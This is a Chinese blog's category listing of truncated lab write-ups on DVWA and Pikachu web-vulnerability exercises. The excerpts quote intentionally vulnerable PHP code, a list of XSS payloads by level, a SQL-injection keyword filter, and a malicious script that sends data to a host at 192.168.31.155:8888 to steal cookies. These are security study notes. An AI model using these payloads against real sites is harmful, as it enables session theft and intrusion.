随笔分类 -  靶场

摘要:buy.php,加载了js中的buy.js <script type="text/javascript" src="js/buy.js"></script> buy.js中发起对api.php的post请求,并且带上了我们输入的7位号码 function buy(){ $('#wait').show 阅读全文
posted @ 2021-06-19 16:27 1jzz 阅读(86) 评论(0) 推荐(0)
摘要:魔术方法__autoload了解: 这是一个自动加载函数,在PHP5中,当我们实例化一个未定义的类时,就会触发此函数。 文件:shuchu.php <?php class shuchu { function print_message(){ echo 'message is printed'; } 阅读全文
posted @ 2021-05-26 20:49 1jzz 阅读(301) 评论(0) 推荐(0)
摘要:代码: <?php $url = $_GET['url']; if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){ $site_info = parse_url($url); print_r($site_info); if(preg_ma 阅读全文
posted @ 2021-05-26 16:20 1jzz 阅读(169) 评论(0) 推荐(0)
摘要:过滤函数: function stop_hack($value){ $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfi 阅读全文
posted @ 2021-05-25 20:45 1jzz 阅读(98) 评论(0) 推荐(0)
摘要:第一关: <script>alert(/xss/)</script> 第二关: "><script>alert(1)</script> 第三关: ' onfocus='alert(1)' 第四关: " onclick="alert(1)" 第五关: "><a href=javascript:aler 阅读全文
posted @ 2021-03-10 23:24 1jzz 阅读(282) 评论(0) 推荐(1)
摘要:php反序列化介绍: 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。序列化serialize()序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s= 阅读全文
posted @ 2021-02-01 22:07 1jzz 阅读(95) 评论(0) 推荐(0)
摘要:敏感信息泄露: 介绍: 敏感信息泄露概述 由于后台人员的疏忽或者不当的设计,导致不应该被前端用户看到的数据被轻易的访问到。 比如: 通过访问url下的目录,可以直接列出目录下的文件列表; 输入错误的url参数后报错信息里面包含操作系统、中间件、开发语言的版本或其他信息; 前端的源码(html,css 阅读全文
posted @ 2021-02-01 21:42 1jzz 阅读(108) 评论(0) 推荐(0)
摘要:越权漏洞介绍: 如果使用A用户的权限去操作B用户的数据,A的权限小于B的权限,如果能够成功操作,则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。 一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 阅读全文
posted @ 2021-02-01 16:46 1jzz 阅读(813) 评论(0) 推荐(0)
摘要:不安全的文件下载:介绍: 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼 阅读全文
posted @ 2021-02-01 15:48 1jzz 阅读(602) 评论(0) 推荐(0)
摘要:1、exec “ping” 查看代码: if(isset($_POST['submit']) && $_POST['ipaddress']!=null){ $ip=$_POST['ipaddress']; // $check=explode('.', $ip);可以先拆分,然后校验数字以范围,第一位 阅读全文
posted @ 2021-01-29 16:34 1jzz 阅读(127) 评论(0) 推荐(0)
摘要:1、数字型注入 查看代码: if(isset($_POST['submit']) && $_POST['id']!=null){ //这里没有做任何处理,直接拼到select里面去了,形成Sql注入 $id=$_POST['id']; $query="select username,email fr 阅读全文
posted @ 2021-01-29 02:31 1jzz 阅读(177) 评论(0) 推荐(0)
摘要:难度1-Low 查看代码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n 阅读全文
posted @ 2021-01-28 22:25 1jzz 阅读(111) 评论(0) 推荐(0)
摘要:难度1-Low 查看代码: <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); 阅读全文
posted @ 2021-01-28 15:41 1jzz 阅读(106) 评论(0) 推荐(0)
摘要:1、利用环境配置 首先在kali中开启apacha服务 sudo service apache2 start 然后在网站目录/var/www/html 下创建一个恶意js脚本 var image=new Image();image.src="http://192.168.31.155:8888/co 阅读全文
posted @ 2021-01-28 15:19 1jzz 阅读(310) 评论(0) 推荐(0)
摘要:难度1-Low 查看代码: <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>He 阅读全文
posted @ 2021-01-28 13:27 1jzz 阅读(90) 评论(0) 推荐(0)
摘要:XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWA 阅读全文
posted @ 2021-01-26 00:22 1jzz 阅读(156) 评论(0) 推荐(0)
摘要:1、验证码绕过(on-server) 先看看提示,提示说验证码好像一直有效,那么这个验证码可能只需要验证一次之后可以重复利用 查看一下后端代码: if(isset($_POST['submit'])) { if (empty($_POST['username'])) { $html .= "<p c 阅读全文
posted @ 2021-01-26 00:05 1jzz 阅读(139) 评论(0) 推荐(0)
摘要:难度1-Low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( 阅读全文
posted @ 2021-01-23 23:03 1jzz 阅读(174) 评论(0) 推荐(0)
摘要:难度1-low 直接使用bp的Intruder模块进行密码爆破即可得出密码。 难度2-Medium 比难度1多了一个登录失败睡两秒钟的代码,所以要慢一点 难度3-High 用generateSessionToken()函数生成随机Token 在GET传参中如果存在Login变量就先对传入的user_ 阅读全文
posted @ 2021-01-23 22:29 1jzz 阅读(153) 评论(0) 推荐(0)